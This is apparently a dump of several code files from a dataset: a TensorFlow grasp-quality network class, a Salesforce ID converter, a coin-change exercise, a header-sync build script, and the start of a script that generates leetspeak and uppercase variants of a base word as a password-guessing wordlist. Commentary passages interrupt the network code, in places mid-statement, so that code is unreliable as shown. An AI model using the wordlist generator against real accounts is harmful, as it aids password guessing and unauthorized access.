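A caveat worth illustrating: the spatial bookkeeping above divides with "/", so if run under Python 3 the layer_height and layer_width values become floats and poison the derived fc3 input size (the file reads as Python 2 code). A sketch of the same kind of bookkeeping with integer math, assuming SAME-padded pooling as in the network builder further down; the sizes and strides here are made up:

import math

def pooled_dims(h, w, pool_stride):
    # SAME padding: output dimension = ceil(input dimension / stride)
    return math.ceil(h / pool_stride), math.ceil(w / pool_stride)

h, w = 32, 32                    # assumed input image size
for stride in (1, 2, 1, 2):      # assumed pool strides of the four conv layers
    h, w = pooled_dims(h, w, stride)
print(h * w * 64)                # flattened feature size for 64 filters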
tf.Variable(tf.truncated_normal([fc4_im_in_size, fc4_out_size], stddev=fc4_std), name='fc4W_im')\n fc4W_pose = tf.Variable(tf.truncated_normal([fc4_pose_in_size, fc4_out_size], stddev=fc4_std), name='fc4W_pose')\n fc4b = tf.Variable(tf.truncated_normal([fc4_out_size], stddev=fc4_std), name='fc4b')\n\n # fc5\n fc5_in_size = fc4_out_size\n fc5_out_size = cfg['fc5']['out_size']\n fc5_std = np.sqrt(2.0 / (fc5_in_size))\n fc5W = tf.Variable(tf.truncated_normal([fc5_in_size, fc5_out_size], stddev=fc5_std), name='fc5W')\n fc5b = tf.Variable(tf.constant(0.0, shape=[fc5_out_size]), name='fc5b')\n\n # create empty weight object and fill it up\n self._weights = GQCnnWeights()\n\n self._weights.conv1_1W = conv1_1W\n self._weights.conv1_1b = conv1_1b\n self._weights.conv1_2W = conv1_2W\n self._weights.conv1_2b = conv1_2b\n self._weights.conv2_1W = conv2_1W\n self._weights.conv2_1b = conv2_1b\n self._weights.conv2_2W = conv2_2W\n self._weights.conv2_2b = conv2_2b\n \n if use_conv3:\n self._weights.conv3_1W = conv3_1W\n self._weights.conv3_1b = conv3_1b\n self._weights.conv3_2W = conv3_2W\n self._weights.conv3_2b = conv3_2b\n\n self._weights.fc3W = fc3W\n self._weights.fc3b = fc3b\n self._weights.fc4W_im = fc4W_im\n self._weights.fc4W_pose = fc4W_pose\n self._weights.fc4b = fc4b\n self._weights.fc5W = fc5W\n self._weights.fc5b = fc5b\n self._weights.pc1W = pc1W\n self._weights.pc1b = pc1b\n\n if pc2_out_size > 0:\n self._weights.pc2W = pc2W\n self._weights.pc2b = pc2b\n\n def _parse_config(self, config):\n \"\"\" Parses configuration file for this GQCNN \n\n Parameters\n ----------\n config : dict\n python dictionary of configuration parameters such as architecure and basic data params such as batch_size for prediction,\n im_height, im_width, ... \n \"\"\"\n\n # load tensor params\n self._batch_size = config['batch_size']\n self._im_height = config['im_height']\n self._im_width = config['im_width']\n self._num_channels = config['im_channels']\n self._input_data_mode = config['input_data_mode']\n\n # setup correct pose dimensions \n if self._input_data_mode == InputDataMode.TF_IMAGE:\n # depth\n self._pose_dim = 1\n elif self._input_data_mode == InputDataMode.TF_IMAGE_PERSPECTIVE:\n # depth, cx, cy\n self._pose_dim = 3\n elif self._input_data_mode == InputDataMode.RAW_IMAGE:\n # u, v, depth, theta\n self._pose_dim = 4\n elif self._input_data_mode == InputDataMode.RAW_IMAGE_PERSPECTIVE:\n # u, v, depth, theta, cx, cy\n self._pose_dim = 6\n\n # create feed tensors for prediction\n self._input_im_arr = np.zeros([self._batch_size, self._im_height,\n self._im_width, self._num_channels])\n self._input_pose_arr = np.zeros([self._batch_size, self._pose_dim])\n\n # load architecture\n self._architecture = config['architecture']\n self._use_conv3 = False\n if 'conv3_1' in self._architecture.keys():\n self._use_conv3 = True\n self._use_pc2 = False\n if self._architecture['pc2']['out_size'] > 0:\n self._use_pc2 = True\n\n # get in and out sizes of fully-connected layer for possible re-initialization\n self.pc2_out_size = self._architecture['pc2']['out_size']\n self.pc1_in_size = self._pose_dim\n self.pc1_out_size = self._architecture['pc1']['out_size']\n self.fc3_in_size = self._architecture['pc2']['out_size']\n self.fc3_out_size = self._architecture['fc3']['out_size']\n self.fc4_in_size = self._architecture['fc3']['out_size']\n self.fc4_out_size = self._architecture['fc4']['out_size'] \n self.fc5_in_size = self._architecture['fc4']['out_size']\n self.fc5_out_size = self._architecture['fc5']['out_size']\n\n if 
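For orientation, an assumed and heavily abbreviated example of the dict that _parse_config below expects; every value here is a placeholder (real GQ-CNN configs are loaded from YAML, and the exact input_data_mode strings live in the InputDataMode enum, which is not shown in this chunk):

example_config = {
    'batch_size': 16,
    'im_height': 32, 'im_width': 32, 'im_channels': 1,
    'input_data_mode': 'tf_image',       # assumed value mapping to pose_dim == 1
    'radius': 2, 'alpha': 2.0e-05, 'beta': 0.75, 'bias': 1.0,
    'architecture': {
        # conv1_1 .. conv2_2 entries with filt_dim / num_filt / pool_size /
        # pool_stride / norm / norm_type, as read by init_weights_gaussian above
        'pc1': {'out_size': 16},
        'pc2': {'out_size': 0},          # 0 disables the second pose layer
        'fc3': {'out_size': 1024},
        'fc4': {'out_size': 1024},
        'fc5': {'out_size': 2},
    },
}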
self.pc2_out_size == 0:\n self.fc4_pose_in_size = self.pc1_out_size\n else:\n self.fc4_pose_in_size = self.pc2_out_size\n\n # load normalization constants\n self.normalization_radius = config['radius']\n self.normalization_alpha = config['alpha']\n self.normalization_beta = config['beta']\n self.normalization_bias = config['bias']\n\n # initialize means and standard deviation to be 0 and 1, respectively\n self._im_mean = 0\n self._im_std = 1\n self._pose_mean = np.zeros(self._pose_dim)\n self._pose_std = np.ones(self._pose_dim)\n\n def initialize_network(self, add_softmax=True):\n \"\"\" Set up input nodes and builds network.\n\n Parameters\n ----------\n add_softmax : float\n whether or not to add a softmax layer\n \"\"\"\n\n with self._graph.as_default():\n # setup tf input placeholders and build network\n self._input_im_node = tf.placeholder(\n tf.float32, (self._batch_size, self._im_height, self._im_width, self._num_channels))\n self._input_pose_node = tf.placeholder(\n tf.float32, (self._batch_size, self._pose_dim))\n\n # build network\n self._output_tensor = self._build_network(self._input_im_node, self._input_pose_node)\n if add_softmax:\n self.add_softmax_to_predict()\n\n def open_session(self):\n \"\"\" Open tensorflow session \"\"\"\n with self._graph.as_default():\n init = tf.global_variables_initializer()\n # create custom config that tells tensorflow to allocate GPU memory \n # as needed so it is possible to run multiple tf sessions on the same GPU\n self.tf_config = tf.ConfigProto()\n self.tf_config.gpu_options.allow_growth = True\n self._sess = tf.Session(config = self.tf_config)\n self._sess.run(init)\n return self._sess\n\n def close_session(self):\n \"\"\" Close tensorflow session \"\"\"\n with self._graph.as_default():\n self._sess.close()\n self._sess = None\n\n @property\n def batch_size(self):\n return self._batch_size\n\n @property\n def im_height(self):\n return self._im_height\n\n @property\n def im_width(self):\n return self._im_width\n\n @property\n def im_mean(self):\n return self._im_mean\n\n @property\n def im_std(self):\n return self._im_std\n\n @property\n def pose_mean(self):\n return self._pose_mean\n\n @property\n def pose_std(self):\n return self._pose_std\n\n @property\n def num_channels(self):\n return self._num_channels\n\n @property\n def pose_dim(self):\n return self._pose_dim\n\n @property\n def input_data_mode(self):\n return self._input_data_mode\n\n @property\n def input_im_node(self):\n return self._input_im_node\n\n @property\n def input_pose_node(self):\n return self._input_pose_node\n\n @property\n def output(self):\n return self._output_tensor\n\n @property\n def weights(self):\n return self._weights\n\n @property\n def graph(self):\n return self._graph\n\n def update_im_mean(self, im_mean):\n \"\"\" Updates image mean to be used for normalization when predicting \n \n Parameters\n ----------\n im_mean : float\n image mean to be used\n \"\"\"\n self._im_mean = im_mean\n \n def get_im_mean(self):\n \"\"\" Get the current image mean to be used for normalization when predicting\n\n Returns\n -------\n : float\n image mean\n \"\"\"\n return self.im_mean\n\n def update_im_std(self, im_std):\n \"\"\" Updates image standard deviation to be used for normalization when predicting \n \n Parameters\n ----------\n im_std : float\n image standard deviation to be used\n \"\"\"\n self._im_std = im_std\n\n def get_im_std(self):\n \"\"\" Get the current image standard deviation to be used for normalization when predicting\n\n Returns\n -------\n : float\n 
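open_session() and close_session() above leave pairing to the caller, just as predict() further down does with its close_sess flag; a small convenience wrapper, assuming a constructed network object (here called net):

import contextlib

@contextlib.contextmanager
def gqcnn_session(net):
    # yield an open session and close it even if the body raises
    sess = net.open_session()
    try:
        yield sess
    finally:
        net.close_session()

# usage (illustrative): with gqcnn_session(net): probs = net.predict(images, poses)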
image standard deviation\n \"\"\"\n return self.im_std\n\n def update_pose_mean(self, pose_mean):\n \"\"\" Updates pose mean to be used for normalization when predicting \n \n Parameters\n ----------\n pose_mean :obj:`tensorflow Tensor`\n pose mean to be used\n \"\"\"\n self._pose_mean = pose_mean\n\n def get_pose_mean(self):\n \"\"\" Get the current pose mean to be used for normalization when predicting\n\n Returns\n -------\n :obj:`tensorflow Tensor`\n pose mean\n \"\"\"\n return self._pose_mean\n\n def update_pose_std(self, pose_std):\n \"\"\" Updates pose standard deviation to be used for normalization when predicting \n \n Parameters\n ----------\n pose_std :obj:`tensorflow Tensor`\n pose standard deviation to be used\n \"\"\"\n self._pose_std = pose_std\n\n def get_pose_std(self):\n \"\"\" Get the current pose standard deviation to be used for normalization when predicting\n\n Returns\n -------\n :obj:`tensorflow Tensor`\n pose standard deviation\n \"\"\"\n return self._pose_std\n \n def add_softmax_to_predict(self):\n \"\"\" Adds softmax to output tensor of prediction network \"\"\"\n self._output_tensor = tf.nn.softmax(self._output_tensor)\n\n def update_batch_size(self, batch_size):\n \"\"\" Updates the prediction batch size \n\n Parameters\n ----------\n batch_size : float\n batch size to be used for prediction\n \"\"\"\n self._batch_size = batch_size\n\n def predict(self, image_arr, pose_arr):\n \"\"\" Predict a set of images in batches \n\n Parameters\n ----------\n image_arr : :obj:`tensorflow Tensor`\n 4D Tensor of images to be predicted\n pose_arr : :obj:`tensorflow Tensor`\n 4D Tensor of poses to be predicted\n \"\"\"\n\n # setup prediction\n num_images = image_arr.shape[0]\n num_poses = pose_arr.shape[0]\n output_arr = np.zeros([num_images, self.fc5_out_size])\n if num_images != num_poses:\n raise ValueError('Must provide same number of images and poses')\n\n # predict by filling in image array in batches\n close_sess = False\n with self._graph.as_default():\n if self._sess is None:\n close_sess = True\n self.open_session()\n i = 0\n while i < num_images:\n logging.debug('Predicting file %d' % (i))\n dim = min(self._batch_size, num_images - i)\n cur_ind = i\n end_ind = cur_ind + dim\n self._input_im_arr[:dim, :, :, :] = (\n image_arr[cur_ind:end_ind, :, :, :] - self._im_mean) / self._im_std\n self._input_pose_arr[:dim, :] = (\n pose_arr[cur_ind:end_ind, :] - self._pose_mean) / self._pose_std\n\n gqcnn_output = self._sess.run(self._output_tensor,\n feed_dict={self._input_im_node: self._input_im_arr,\n self._input_pose_node: self._input_pose_arr})\n output_arr[cur_ind:end_ind, :] = gqcnn_output[:dim, :]\n\n i = end_ind\n if close_sess:\n self.close_session()\n return output_arr\n\t\t\n @property\n def filters(self):\n \"\"\" Returns the set of conv1_1 filters \n\n Returns\n -------\n :obj:`tensorflow Tensor`\n filters(weights) from conv1_1 of the network\n \"\"\"\n\n close_sess = False\n if self._sess is None:\n close_sess = True\n self.open_session()\n\n filters = self._sess.run(self._weights.conv1_1W)\n\n if close_sess:\n self.close_session()\n return filters\n\n def _build_network(self, input_im_node, input_pose_node, drop_fc3=False, drop_fc4=False, fc3_drop_rate=0, fc4_drop_rate=0):\n \"\"\" Builds neural network \n\n Parameters\n ----------\n input_im_node : :obj:`tensorflow Placeholder`\n network input image placeholder\n input_pose_node : :obj:`tensorflow Placeholder`\n network input pose placeholder\n drop_fc3 : bool\n boolean value whether to drop third 
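The batching loop in predict() above re-uses a fixed input buffer and walks [i, i + dim) windows; the index arithmetic and normalization in isolation (NumPy only, all shapes assumed):

import numpy as np

def batch_bounds(n, batch_size):
    # yield (start, end) pairs exactly as predict() steps through them
    i = 0
    while i < n:
        end = min(i + batch_size, n)
        yield i, end
        i = end

images = np.zeros((10, 32, 32, 1))
im_mean, im_std = 0.0, 1.0
for start, end in batch_bounds(len(images), batch_size=4):
    batch = (images[start:end] - im_mean) / im_std   # same normalization as above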
fully-connected layer or not to reduce over_fitting\n drop_fc4 : bool\n boolean value whether to drop fourth fully-connected layer or not to reduce over_fitting\n fc3_drop_rate : float\n drop rate for third fully-connected layer\n fc4_drop_rate : float\n drop rate for fourth fully-connected layer\n\n Returns\n -------\n :obj:`tensorflow Tensor`\n output of network\n \"\"\"\n\n # conv1_1\n conv1_1h = tf.nn.relu(tf.nn.conv2d(input_im_node, self._weights.conv1_1W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv1_1b)\n if self._architecture['conv1_1']['norm']:\n if self._architecture['conv1_1']['norm_type'] == \"local_response\":\n \tconv1_1h = tf.nn.local_response_normalization(conv1_1h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool1_1_size = self._architecture['conv1_1']['pool_size']\n pool1_1_stride = self._architecture['conv1_1']['pool_stride']\n pool1_1 = tf.nn.max_pool(conv1_1h,\n ksize=[1, pool1_1_size, pool1_1_size, 1],\n strides=[1, pool1_1_stride,\n pool1_1_stride, 1],\n padding='SAME')\n conv1_1_num_nodes = reduce_shape(pool1_1.get_shape())\n conv1_1_flat = tf.reshape(pool1_1, [-1, conv1_1_num_nodes])\n\n # conv1_2\n conv1_2h = tf.nn.relu(tf.nn.conv2d(pool1_1, self._weights.conv1_2W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv1_2b)\n if self._architecture['conv1_2']['norm']:\n if self._architecture['conv1_2']['norm_type'] == \"local_response\":\n \tconv1_2h = tf.nn.local_response_normalization(conv1_2h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool1_2_size = self._architecture['conv1_2']['pool_size']\n pool1_2_stride = self._architecture['conv1_2']['pool_stride']\n pool1_2 = tf.nn.max_pool(conv1_2h,\n ksize=[1, pool1_2_size, pool1_2_size, 1],\n strides=[1, pool1_2_stride,\n pool1_2_stride, 1],\n padding='SAME')\n conv1_2_num_nodes = reduce_shape(pool1_2.get_shape())\n conv1_2_flat = tf.reshape(pool1_2, [-1, conv1_2_num_nodes])\n\n # conv2_1\n conv2_1h = tf.nn.relu(tf.nn.conv2d(pool1_2, self._weights.conv2_1W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv2_1b)\n if self._architecture['conv2_1']['norm']:\n if self._architecture['conv2_1']['norm_type'] == \"local_response\":\n \tconv2_1h = tf.nn.local_response_normalization(conv2_1h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool2_1_size = self._architecture['conv2_1']['pool_size']\n pool2_1_stride = self._architecture['conv2_1']['pool_stride']\n pool2_1 = tf.nn.max_pool(conv2_1h,\n ksize=[1, pool2_1_size, pool2_1_size, 1],\n strides=[1, pool2_1_stride,\n pool2_1_stride, 1],\n padding='SAME')\n conv2_1_num_nodes = reduce_shape(pool2_1.get_shape())\n conv2_1_flat = tf.reshape(pool2_1, [-1, conv2_1_num_nodes])\n\n # conv2_2\n conv2_2h = tf.nn.relu(tf.nn.conv2d(pool2_1, self._weights.conv2_2W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv2_2b)\n if self._architecture['conv2_2']['norm']:\n if self._architecture['conv2_2']['norm_type'] == \"local_response\":\n \tconv2_2h = tf.nn.local_response_normalization(conv2_2h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool2_2_size = self._architecture['conv2_2']['pool_size']\n pool2_2_stride = self._architecture['conv2_2']['pool_stride']\n 
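Each layer of _build_network repeats the same conv, optional local-response-norm, then max-pool sequence; a hedged refactoring sketch using the same TF1-style ops (this helper is not part of the original file, and lrn_params is assumed to pack the four normalization constants):

import tensorflow as tf

def conv_block(x, W, b, layer_cfg, lrn_params):
    h = tf.nn.relu(tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME') + b)
    if layer_cfg['norm'] and layer_cfg['norm_type'] == 'local_response':
        h = tf.nn.local_response_normalization(h, **lrn_params)
    k, s = layer_cfg['pool_size'], layer_cfg['pool_stride']
    return tf.nn.max_pool(h, ksize=[1, k, k, 1], strides=[1, s, s, 1],
                          padding='SAME')

# lrn_params = dict(depth_radius=..., bias=..., alpha=..., beta=...)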
pool2_2 = tf.nn.max_pool(conv2_2h,\n ksize=[1, pool2_2_size, pool2_2_size, 1],\n strides=[1, pool2_2_stride,\n pool2_2_stride, 1],\n padding='SAME')\n conv2_2_num_nodes = reduce_shape(pool2_2.get_shape())\n conv2_2_flat = tf.reshape(pool2_2, [-1, conv2_2_num_nodes])\n\n if self._use_conv3:\n # conv3_1\n conv3_1h = tf.nn.relu(tf.nn.conv2d(pool2_2, self._weights.conv3_1W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv3_1b)\n if self._architecture['conv3_1']['norm']:\n \tif self._architecture['conv3_1']['norm_type'] == \"local_response\":\n \tconv3_1h = tf.nn.local_response_normalization(conv3_1h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool3_1_size = self._architecture['conv3_1']['pool_size']\n pool3_1_stride = self._architecture['conv3_1']['pool_stride']\n pool3_1 = tf.nn.max_pool(conv3_1h,\n ksize=[1, pool3_1_size, pool3_1_size, 1],\n strides=[1, pool3_1_stride,\n pool3_1_stride, 1],\n padding='SAME')\n conv3_1_num_nodes = reduce_shape(pool3_1.get_shape())\n conv3_1_flat = tf.reshape(pool3_1, [-1, conv3_1_num_nodes])\n\n # conv3_2\n conv3_2h = tf.nn.relu(tf.nn.conv2d(pool3_1, self._weights.conv3_2W, strides=[\n 1, 1, 1, 1], padding='SAME') + self._weights.conv3_2b)\n if self._architecture['conv3_2']['norm']:\n \tif self._architecture['conv3_2']['norm_type'] == \"local_response\":\n \tconv3_2h = tf.nn.local_response_normalization(conv3_2h,\n depth_radius=self.normalization_radius,\n alpha=self.normalization_alpha,\n beta=self.normalization_beta,\n bias=self.normalization_bias)\n pool3_2_size = self._architecture['conv3_2']['pool_size']\n pool3_2_stride = self._architecture['conv3_2']['pool_stride']\n pool3_2 = tf.nn.max_pool(conv3_2h,\n ksize=[1, pool3_2_size, pool3_2_size, 1],\n strides=[1, pool3_2_stride,\n pool3_2_stride, 1],\n padding='SAME')\n conv3_2_num_nodes = reduce_shape(pool3_2.get_shape())\n conv3_2_flat = tf.reshape(pool3_2, [-1, conv3_2_num_nodes])\n\n # fc3\n if self._use_conv3:\n fc3 = tf.nn.relu(tf.matmul(conv3_2_flat, self._weights.fc3W) +\n self._weights.fc3b)\n else:\n fc3 = tf.nn.relu(tf.matmul(conv2_2_flat, self._weights.fc3W) +\n self._weights.fc3b)\n\n # drop fc3 if necessary\n if drop_fc3:\n fc3 = tf.nn.dropout(fc3, fc3_drop_rate)\n\n # pc1\n pc1 = tf.nn.relu(tf.matmul(input_pose_node, self._weights.pc1W) +\n self._weights.pc1b)\n\n if self._use_pc2:\n # pc2\n pc2 = tf.nn.relu(tf.matmul(pc1, self._weights.pc2W) +\n self._weights.pc2b)\n # fc4\n fc4 = tf.nn.relu(tf.matmul(fc3, self._weights.fc4W_im) +\n tf.matmul(pc2, self._weights.fc4W_pose) +\n self._weights.fc4b)\n else:\n # fc4\n fc4 = tf.nn.relu(tf.matmul(fc3, self._weights.fc4W_im) +\n tf.matmul(pc1, self._weights.fc4W_pose) +\n self._weights.fc4b)\n\n # drop fc4 if necessary\n if drop_fc4:\n fc4 = tf.nn.dropout(fc4, fc4_drop_rate)\n\n # fc5\n fc5 = tf.matmul(fc4, self._weights.fc5W) + self._weights.fc5b\n\n return fc5\n","sub_path":"gqcnn/neural_networks.py","file_name":"neural_networks.py","file_ext":"py","file_size_in_byte":38931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"617151563","text":"from exceptions import ValueError\n\n\ndef convert_id_15_to_18(sf_id):\n chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n full_chars = chars + '012345'\n\n if not sf_id or len(sf_id) not in (15, 18):\n raise ValueError('SalesForce id must be string value with length 15 or 18 symbols')\n\n if 18 == len(sf_id):\n return sf_id\n\n chunks = [ sf_id[i:i + 5] 
for i in range(0, 15, 5)]\n suffix = ''\n for chunk in chunks:\n reversed_chunk = chunk[::-1]\n binary_id_str = ''.join(['1' if i in chars else '0' for i in reversed_chunk])\n suffix += full_chars[int(binary_id_str, 2)]\n return sf_id + suffix\n\n\n\n","sub_path":"salesforce_id_converter.py","file_name":"salesforce_id_converter.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"343282112","text":"import sys\n# Change-making (greedy approach)\n\ndef coinChange(n):\n '''\n Write a function that returns the minimum number of coins needed to give back n won.\n\n Denominations: 1, 5, 10, 50, 100\n '''\n\n coins = [100, 50, 10, 5, 1]\n result = 0\n\n for c in coins: # hand out the largest denominations first\n result += n // c\n n -= c * (n // c) # n becomes the remaining amount\n\n return result\n\n\ndef main():\n '''\n Do not modify this part.\n '''\n\n n = int(input())\n\n print(coinChange(n))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"elice_example/coinChange.py","file_name":"coinChange.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"8445240","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Hardlinked at SHARED/sync.py\n\n# I use this common file to sync headers and binaries from source trees,\n# assuming all source trees are accessible from the common path, ../\n#\n# vendor - various third-party libraries\n# https://github.com/golightlyb/vendor\n\n\nimport os, sys, filecmp, shutil\n\nquiet = False\n\ntargets = [\n 'linux32', 'linux32-debug', 'linux32-profile',\n 'linux64', 'linux64-debug', 'linux64-profile',\n 'win32', 'win32-debug', 'win32-profile',\n 'win64', 'win64-debug', 'win64-profile',\n]\n\nrules = {\n 'cfw': [\n ('!mkdir', 'include/cfw'),\n ('!mkdir', 'lib/$(TARGET)'),\n ('../cfw/src/cfw/base.h', 'include/cfw/'),\n ('../cfw/src/cfw/base_mmgr.h', 'include/cfw/'),\n ('../cfw/src/cfw/base_notice.h', 'include/cfw/'),\n ('../cfw/src/cfw/base_tmgr.h', 'include/cfw/'),\n ('../cfw/src/cfw/collection.h', 'include/cfw/'),\n ('../cfw/bin/$(TARGET)/cfw.a', 'lib/$(TARGET)/'),\n ],\n 'vendor-jpeg': [\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/jpeglib.h', 'include/'),\n ('../vendor/include/jerror.h', 'include/'),\n ('../vendor/include/jconfig.h', 'include/'),\n ('../vendor/include/jmorecfg.h', 'include/'),\n ('../vendor/bin/$(TARGET)/jpeg-9b.a', 'lib/$(TARGET)/'),\n ],\n 'vendor-png': [\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/png.h', 'include/'),\n ('../vendor/include/pngconf.h', 'include/'),\n ('../vendor/include/pnglibconf.h', 'include/'),\n ('../vendor/bin/$(TARGET)/libpng.a', 'lib/$(TARGET)/'),\n ], \n 'vendor-glfw': [\n ('!mkdir', 'include/GLFW'),\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/GLFW/glfw3.h', 'include/GLFW/'),\n ('../vendor/include/GLFW/glfw3native.h','include/GLFW/'),\n ('../vendor/bin/$(TARGET)/glfw.a', 'lib/$(TARGET)/'),\n ],\n 'vendor-gl3w.h': [\n ('!mkdir', 'include/gl3w'),\n ('../vendor/include/gl3w/glcorearb.h', 'include/gl3w/'),\n ('../vendor/include/gl3w/gl3w.h', 'include/gl3w/'),\n ('../vendor/include/gl3w/wglext.h', 'include/gl3w/'),\n ('../vendor/include/gl3w/glxext.h', 'include/gl3w/'),\n ],\n 'vendor-soundio': [\n ('!mkdir', 'include'),\n ('!mkdir', 'include/soundio'),\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/soundio/endian.h', 'include/soundio/'),\n ('../vendor/include/soundio/soundio.h', 'include/soundio/'),\n ('../vendor/bin/$(TARGET)/libsoundio.a','lib/$(TARGET)/'),\n ], \n 'vendor-isaac': [\n ('!mkdir', 'include'),\n ('!mkdir', 
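A quick property check for the 15-to-18 id conversion in salesforce_id_converter.py above: the three 5-character chunks each contribute one suffix character, so the result is always 18 characters long and keeps the original id as a prefix (the id below is made up, not a real Salesforce record):

sf18 = convert_id_15_to_18('001A0000006Vm9r')
assert len(sf18) == 18 and sf18.startswith('001A0000006Vm9r')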
'lib/$(TARGET)'),\n ('../vendor/include/isaac.h', 'include/'),\n ('../vendor/bin/$(TARGET)/isaac.a', 'lib/$(TARGET)/'),\n ],\n 'vendor-xxhash': [\n ('!mkdir', 'include'),\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/xxhash.h', 'include/'),\n ('../vendor/bin/$(TARGET)/xxhash.o', 'lib/$(TARGET)/'),\n ],\n 'vendor-zlib': [\n ('!mkdir', 'include'),\n ('!mkdir', 'lib/$(TARGET)'),\n ('../vendor/include/zlib.h', 'include/'),\n ('../vendor/include/zconf.h', 'include/'),\n ('../vendor/bin/$(TARGET)/zlib.a', 'lib/$(TARGET)/'),\n ],\n}\n\ndef cp(src, dest):\n dest += os.path.basename(src)\n status = '=='\n \n try:\n if not filecmp.cmp(src, dest):\n status = '>>'\n shutil.copy2(src, dest)\n except FileNotFoundError:\n status = '++'\n shutil.copy2(src, dest)\n \n if not quiet:\n print(\"%s%s%s\" % (src.ljust(44), status, dest.rjust(34)))\n\n\ndef mkdir(at):\n os.makedirs(at, exist_ok=True)\n\nif len(sys.argv) >= 2:\n for i in sys.argv[1:]:\n if i.startswith('--'):\n i = i[2:]\n if i == 'quiet':\n quiet = True\n else:\n print(\"unkown flag %s\" % i)\n sys.exit(1)\n else:\n if i not in rules:\n print(\"unkown command %s\" % i)\n sys.exit(1)\n\n for ruleid, mappings in rules.items():\n if ruleid in sys.argv[1:]:\n for (src, dest) in mappings:\n if not src.startswith('!'):\n if '$' in src+dest:\n for target in targets:\n _src = src.replace ('$(TARGET)', target)\n _dest = dest.replace('$(TARGET)', target)\n cp(_src, _dest)\n else:\n cp(src, dest)\n else:\n if '$' in dest:\n for target in targets:\n _dest = dest.replace('$(TARGET)', target)\n mkdir(_dest)\n else:\n mkdir(dest)\n sys.exit(0)\n\nname = sys.argv[0]\nprint(\"usage: %s RULE[, RULE, ...] [--quiet]\" % name)\nfor ruleid, mapping in rules.items():\n print(\" %s %s\" % (name, ruleid))\nsys.exit(1)\n","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"229777119","text":"\n\nimport sys\nimport time\n\nbase=sys.argv[1]\n\nwordlist=open(base+\".txt\",\"a\")\nglobal wdbase\nwdbase=[]\n\ndef leet_lite():\n baseleet=base.replace(\"a\",\"4\")\n baseleet=baseleet.replace(\"e\",\"3\")\n baseleet=baseleet.replace(\"o\",\"0\")\n global baseleetlite\n baseleetlite=baseleet\n\n\n\n\n\ndef leet_medio():\n baseleet=base.replace(\"a\",\"4\")\n baseleet=baseleet.replace(\"e\",\"3\")\n baseleet=baseleet.replace(\"o\",\"0\")\n baseleet=baseleet.replace(\"t\",\"7\")\n baseleet=baseleet.replace(\"l\",\"1\")\n baseleet=baseleet.replace(\"s\",\"5\")\n global baseleetmedio\n baseleetmedio=baseleet\n\n\ndef leet_foda():\n baseleet=base.replace(\"a\",\"4\")\n baseleet=baseleet.replace(\"e\",\"3\")\n baseleet=baseleet.replace(\"o\",\"0\")\n baseleet=baseleet.replace(\"t\",\"7\")\n baseleet=baseleet.replace(\"s\",\"5\")\n global leetfoda\n leetfoda=baseleet.replace(\"g\",\"6\")\n leetfoda=leetfoda.replace(\"i\",\"1\")\n\n\n\n\ndef base_parcial_upper():\n global leters\n leters=[\"b\",\"c\",\"d\",\"f\",\"g\",\"h\",\"j\",\"k\",\"l\",\"m\",\"n\",\"p\",\"q\",\"r\",\"s\",\"t\",\"v\",\"w\",\"x\",\"y\",\"z\"]\n global baseupper\n baseupper=\"\"\n for a in base:\n if a in leters:\n baseupper+=a.upper()\n else:\n baseupper+=a\n\ndef vogalupper():\n let=[\"a\",\"e\",\"i\",\"o\",\"u\"]\n global vogalup\n vogalup=\"\"\n for a in base:\n if a in let:\n vogalup+=a.upper()\n else:\n vogalup+=a\n\n\n\ndef base_upper():\n global baseup\n baseup=base.upper()\n\ndef leet_parcialupper():\n global bleetpacial\n bleetpacial=\"\"\n for a in base:\n if a in 
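The '$(TARGET)' handling in sync.py above fans a single rule out across every build target; the substitution step on its own (rule paths illustrative):

targets = ['linux64', 'linux64-debug', 'win64']
src, dest = '../vendor/bin/$(TARGET)/zlib.a', 'lib/$(TARGET)/'
expanded = [(src.replace('$(TARGET)', t), dest.replace('$(TARGET)', t))
            for t in targets]
# [('../vendor/bin/linux64/zlib.a', 'lib/linux64/'), ...]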
